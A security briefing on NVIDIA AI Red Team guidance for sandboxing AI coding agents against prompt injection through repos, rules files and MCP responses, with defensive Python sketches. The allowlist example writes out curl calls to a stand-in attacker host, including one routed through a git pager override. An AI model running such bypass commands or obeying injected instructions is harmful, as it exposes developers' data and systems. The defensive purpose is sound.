NVIDIA AI Red Team — Mandatory sandbox controls for agentic coding workflows
AI relevance: AI coding agents (Codex, Claude Code, Cursor) run arbitrary code with the developer's full permissions — NVIDIA's AI Red Team now publishes the minimum OS-level controls needed to prevent prompt-injection-to-RCE chains in these tools.
- NVIDIA's AI Red Team released a detailed post outlining mandatory and recommended sandbox controls for agentic coding tools — the first vendor-backed prescriptive guidance at this level of specificity.
- The primary threat: indirect prompt injection via malicious repos, pull requests, git histories, .cursorrules, CLAUDE.md/AGENT.md files, or poisoned MCP server responses. Once the LLM ingests attacker-controlled content, it can be steered to execute harmful commands.
- Three mandatory controls: (1) block network egress to arbitrary hosts (prevents data exfiltration and reverse shells), (2) block file writes outside the workspace (prevents persistence and sandbox escape), (3) block writes to configuration files anywhere (prevents hook, skill, and local MCP config exploitation).
- Application-level controls are insufficient. Once the agent spawns a subprocess, the application has no visibility. Attackers use indirection — calling a restricted tool through an approved one — to bypass allowlists. OS-level sandboxing (macOS Seatbelt, seccomp, etc.) is needed.
- Recommended additional controls: prevent reads outside workspace, sandbox the entire IDE and all spawned processes (hooks, MCP startup scripts, skills), use microVM/Kata for kernel isolation, require per-instance approval for network connections, inject secrets separately so the agent never sees them.
- The guidance explicitly warns against "allow-once / run-many" approval patterns — each action instance needs its own approval to prevent exploitation chains.
- Manual approval alone is fragile due to user habituation — developers routinely rubber-stamp agent actions, creating an exploitable trust gap.
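As a sketch of mandatory control (2), a user-space path check can approximate "writes only inside the workspace." The helper below is hypothetical, not part of any tool's API, and real enforcement belongs at the OS level (Seatbelt, seccomp) as the guidance stresses; a check like this is at best defense in depth:

```python
import os

def is_write_allowed(path: str, workspace: str) -> bool:
    """Return True only if `path` resolves inside the workspace root.

    realpath() collapses symlinks and '..' segments, so a traversal like
    'workspace/../etc/passwd' is rejected rather than taken at face value.
    """
    resolved = os.path.realpath(path)
    root = os.path.realpath(workspace)
    # commonpath() equals the root only when `resolved` sits under it.
    return os.path.commonpath([resolved, root]) == root
```

The key design point is resolving the path before comparing: a naive string-prefix check on the raw path is defeated by `..` segments and symlinks planted inside the workspace.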
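The indirection problem can be made concrete with a toy allowlist (the names here are illustrative, not any real tool's policy). Checking only the program name blocks a restricted tool like curl when called directly, but misses the same network call smuggled through an approved tool: git, for example, will execute whatever command is configured as its pager.

```python
ALLOWED = {"git", "ls", "cat"}

def naive_allowlist(argv: list[str]) -> bool:
    # Checks only the program name -- this is the flaw.
    return argv[0] in ALLOWED

# Direct use of a restricted tool is blocked...
naive_allowlist(["curl", "https://attacker.example/exfil"])  # False
# ...but the same egress routed through an approved tool passes,
# because git runs the configured pager as a shell command:
naive_allowlist(
    ["git", "-c", "core.pager=curl https://attacker.example", "log"]
)  # True
```

This is why the post argues application-level allowlists cannot substitute for OS-level sandboxing: the set of approved binaries that can be coaxed into spawning arbitrary subprocesses is large and hard to enumerate.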
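A minimal sketch of the per-instance approval pattern, with a hypothetical class and callback rather than any tool's actual API: approvals are deliberately never cached, so one "yes" cannot authorize a later, injected invocation of the same action.

```python
class PerInstanceApprover:
    """Every action instance gets a fresh decision; nothing is remembered."""

    def __init__(self, ask):
        self.ask = ask  # callback: str -> bool, e.g. a UI prompt

    def allow(self, action: str) -> bool:
        # Intentionally no memoization and no "remember my choice" path:
        # an earlier approval of this exact action string cannot be
        # replayed by a later call the attacker steered the agent into.
        return bool(self.ask(action))
```

The habituation risk noted above is the counterargument to prompting on every action; the post's answer is to shrink what needs approval (via the mandatory controls) rather than to cache approvals.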
Why it matters
- This is the first time a major hardware/AI vendor's red team has published concrete, implementable sandboxing requirements for AI coding agents. It raises the bar from "be careful" to "here are the specific syscall-level controls."
- The attack vectors listed (poisoned .cursorrules, AGENT.md, MCP configs) are already being exploited in the wild. This isn't theoretical.
- As agentic coding tools become default in enterprise dev workflows, the gap between "full user permissions" and "sandbox isolation" is where breaches will happen.
What to do
- Implement all three mandatory controls (network egress, workspace-only writes, config file protection) for any agentic coding tool in your org.
- Use OS-level sandboxing (containers, microVMs, Seatbelt profiles) rather than relying on the agent application's own allowlists.
- Audit your agent configs: review .cursorrules, AGENT.md, and local MCP server definitions in every cloned repo; they are injection vectors.
- Separate secrets from the agent environment: don't let API keys, SSH keys, or tokens be readable by the sandboxed process.